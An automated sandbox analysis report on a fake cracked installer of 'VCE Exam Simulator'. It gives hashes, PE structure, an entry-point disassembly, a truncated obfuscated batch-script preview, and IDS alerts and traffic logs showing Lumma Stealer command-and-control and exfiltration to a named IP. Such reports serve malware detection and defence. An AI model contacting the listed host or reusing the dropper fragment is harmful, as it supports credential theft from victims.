                                                                                                            Preview:Set Sip=e..TPTry-Continually-Searching-..kcDriver-Raises-Hardcover-Shall-Massachusetts-Newton-..fCOmNewport-Nil-Angels-Edges-Av-Built-Enable-Dates-Ports-..skNaughty-Settings-Ent-..gRWuTitles-Online-..tqYLogan-..EJXProgram-Terminals-..Set Transcripts=m..tqHonor-How-..sSDiameter-Worked-Bigger-Raising-Spain-Madness-Ide-Prix-Thumbzilla-..dlRm-Rank-..hARArray-Captured-Cross-Lebanon-Pools-Dome-Nomination-Festival-..vJeFGenre-Assured-Workout-Got-Compete-Rely-Titled-Dui-Stationery-..DXUhSymantec-Clips-Lord-Kitchen-Aluminum-..uNEeTwisted-Bind-Adoption-Intellectual-Hunger-Disc-..hxISustainability-Excerpt-Bigger-Tribute-Rpg-Ecommerce-..WLzSupplied-Shake-Done-Challenging-..EZhGuinea-Findarticles-Ons-..Set Choir=G..XZyvGrows-Ct-Scoop-Manage-Truly-Ordinance-..KCszDisclose-Ease-Isle-Mature-Scoring-Cg-Nicaragua-Uzbekistan-Exchanges-..RVRivers-Syntax-Lips-Worst-Recent-Acoustic-..yOrQJ-Verbal-Happened-..YJECoins-Forecast-..Set Diverse=W..KcJPackard-Winning-Assembly-Vol-Decades-Mat-Pointed-Encourage-More
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:ASCII text, with very long lines (873), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20756
                                                                                                            Entropy (8bit):5.105149918773854
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:fP9FyITULSw84b1q3+NcMR6HtDk6293d5r2TMIj+Reu4ZMr7RGCV5let041+2NXD:X3y02+4b1o+XR6P293L2TGeu4ZaNGyUT
                                                                                                            MD5:A42926576F58EDA76BDDFFBF3FBE8C35
                                                                                                            SHA1:CB044681CE87642A815F6F0A11D659E56944F13C
                                                                                                            SHA-256:B06C7469D3B0D058F7216B9FCD71C07481358CE855A0D542C378E3DF537064E4
                                                                                                            SHA-512:934EEC9D6E3134BF7EF1938DAF588CE5C136347855D7C75F75C17C2B299DA6559D267A6F71807F83054E2CBE8D2A186600221B2576CE108E4507E895676B6D61
                                                                                                            Malicious:false
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):0.34826564709824204
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.23%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.18%
                                                                                                            • DirectShow filter (201580/2) 0.99%
                                                                                                            • Windows ActiveX control (116523/4) 0.57%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:vce exam simulator 2.2.1 crackk.exe
                                                                                                            File size:927'079'465 bytes
                                                                                                            MD5:636555b743ce6aeb326544eb56e8b5e9
                                                                                                            SHA1:18a672fa6c98b7f54e2c49daf5b33d92925a9ca4
                                                                                                            SHA256:863f990882827996b28b0d7efc6f02c9b734a4ea8f7ef18d777bc8ed8ff214cc
                                                                                                            SHA512:d66993944c37e7e4090ea792477d16657ffcda6ed39c6cf55ac5756d43dc96a9d49b80e318479ec535487a3e81e43481cd90812303f11d4c3bc231b81c978322
                                                                                                            SSDEEP:
                                                                                                            TLSH:
                                                                                                            Icon Hash:072304c1444c390f
                                                                                                            Entrypoint:0x4038af
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                            Signature Valid:
                                                                                                            Signature Issuer:
                                                                                                            Signature Validation Error:
                                                                                                            Error Number:
                                                                                                            Not Before, Not After
                                                                                                              Subject Chain
                                                                                                                Version:
                                                                                                                Thumbprint MD5:
                                                                                                                Thumbprint SHA-1:
                                                                                                                Thumbprint SHA-256:
                                                                                                                Serial:
                                                                                                                Instruction
                                                                                                                sub esp, 000002D4h
                                                                                                                push ebx
                                                                                                                push ebp
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                push 00000020h
                                                                                                                xor ebp, ebp
                                                                                                                pop esi
                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                mov dword ptr [esp+10h], 0040A268h
                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                call dword ptr [00409030h]
                                                                                                                push 00008001h
                                                                                                                call dword ptr [004090B4h]
                                                                                                                push ebp
                                                                                                                call dword ptr [004092C0h]
                                                                                                                push 00000008h
                                                                                                                mov dword ptr [0047EB98h], eax
                                                                                                                call 00007F8D8C6DA85Bh
                                                                                                                push ebp
                                                                                                                push 000002B4h
                                                                                                                mov dword ptr [0047EAB0h], eax
                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                push eax
                                                                                                                push ebp
                                                                                                                push 0040A264h
                                                                                                                call dword ptr [00409184h]
                                                                                                                push 0040A24Ch
                                                                                                                push 00476AA0h
                                                                                                                call 00007F8D8C6DA53Dh
                                                                                                                call dword ptr [004090B0h]
                                                                                                                push eax
                                                                                                                mov edi, 004CF0A0h
                                                                                                                push edi
                                                                                                                call 00007F8D8C6DA52Bh
                                                                                                                push ebp
                                                                                                                call dword ptr [00409134h]
                                                                                                                cmp word ptr [004CF0A0h], 0022h
                                                                                                                mov dword ptr [0047EAB8h], eax
                                                                                                                mov eax, edi
                                                                                                                jne 00007F8D8C6D7E2Ah
                                                                                                                push 00000022h
                                                                                                                pop esi
                                                                                                                mov eax, 004CF0A2h
                                                                                                                push esi
                                                                                                                push eax
                                                                                                                call 00007F8D8C6DA201h
                                                                                                                push eax
                                                                                                                call dword ptr [00409260h]
                                                                                                                mov esi, eax
                                                                                                                mov dword ptr [esp+1Ch], esi
                                                                                                                jmp 00007F8D8C6D7EB3h
                                                                                                                push 00000020h
                                                                                                                pop ebx
                                                                                                                cmp ax, bx
                                                                                                                jne 00007F8D8C6D7E2Ah
                                                                                                                add esi, 02h
                                                                                                                cmp word ptr [esi], bx
                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x1e68a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11e2db | 0x2e88 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x1e68a | 0x1e800 | 87ae4064ad400d6bd4072665936ba491 | False | 0.6280657658811475 | data | 6.043039947311888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0xfd6 | 0x1000 | 79cd0fe30c9b465cc6b756978183fbc8 | False | 0.59716796875 | data | 5.574303368928403 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100354 | 0x1c57 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0015161957270848
RT_ICON | 0x101fac | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.44365337672904803
RT_ICON | 0x104614 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.5068306010928961
RT_ICON | 0x10573c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6542553191489362
RT_ICON | 0x105ba4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.8395390070921985
RT_ICON | 0x10600c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.7399155722326454
RT_ICON | 0x1070b4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.687655601659751
RT_ICON | 0x10965c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.6650330656589514
RT_ICON | 0x10d884 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.6024636223825861
RT_DIALOG | 0x11e0ac | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x11e1ac | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x11e2c8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x11e328 | 0x4c | data | | | 0.8026315789473685
RT_GROUP_ICON | 0x11e374 | 0x3e | data | English | United States | 0.8225806451612904
RT_MANIFEST | 0x11e3b4 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T13:52:40.597951+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:41.425333+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:41.425333+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:42.837509+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:43.719925+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:43.719925+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:45.420635+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:48.910081+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:49.806140+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49739 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:51.213434+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:53.831695+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:56.289015+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:56.292468+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49742 | 104.21.33.227 | 443 | TCP
2024-12-24T13:53:00.764066+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.33.227 | 443 | TCP
2024-12-24T13:53:01.644646+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49743 | 104.21.33.227 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Dec 24, 2024 13:52:43.753367901 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.753384113 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.797892094 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.839441061 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.891674042 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.911448002 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915509939 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915571928 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915677071 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915677071 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915752888 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915795088 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:43.915823936 CET49737443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:43.915843010 CET44349737104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:44.010229111 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:44.010262966 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:44.010351896 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:44.010622025 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:44.010632992 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.420326948 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.420634985 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.421864986 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.421875000 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.422072887 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.423441887 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.423599005 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.423629045 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:45.423688889 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:45.423696995 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.587636948 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.587743998 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.587796926 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.587882996 CET49738443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.587897062 CET44349738104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.651568890 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.651627064 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:47.651715040 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.652141094 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:47.652162075 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.909998894 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.910080910 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.913604975 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.913645983 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.913872957 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:48.915858030 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.916023970 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:48.916069984 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.806121111 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.806195974 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.806317091 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.806432962 CET49739443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.806478977 CET44349739104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.976619959 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.976664066 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:49.976749897 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.977044106 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.977058887 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.213318110 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.213433981 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.214550972 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.214561939 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.214762926 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.215830088 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.215944052 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.215976954 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.216034889 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.216043949 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.498514891 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.498591900 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.498651028 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.498739004 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.498759985 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.618175030 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.618269920 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.618376017 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.618650913 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.618685961 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.831594944 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.831695080 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.832901001 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.832933903 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.833149910 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.834274054 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.834355116 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.834367990 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:54.680293083 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:54.680362940 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:54.680449963 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:54.680579901 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:54.680615902 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:55.072227955 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:55.072278023 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:55.072360039 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:55.072657108 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:55.072685957 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.288924932 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.289015055 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.290049076 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.290064096 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.290270090 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.291198015 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.291831017 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.291872978 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.291985989 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292021990 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292135954 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292232037 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292354107 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292375088 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292510033 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292538881 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292701006 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292730093 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292738914 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292754889 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292907953 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292942047 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292964935 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.293086052 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.293116093 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.335355043 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.335597992 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.335647106 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.335686922 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.379332066 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.379400969 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.423373938 CET44349742104.21.33.227192.168.2.4
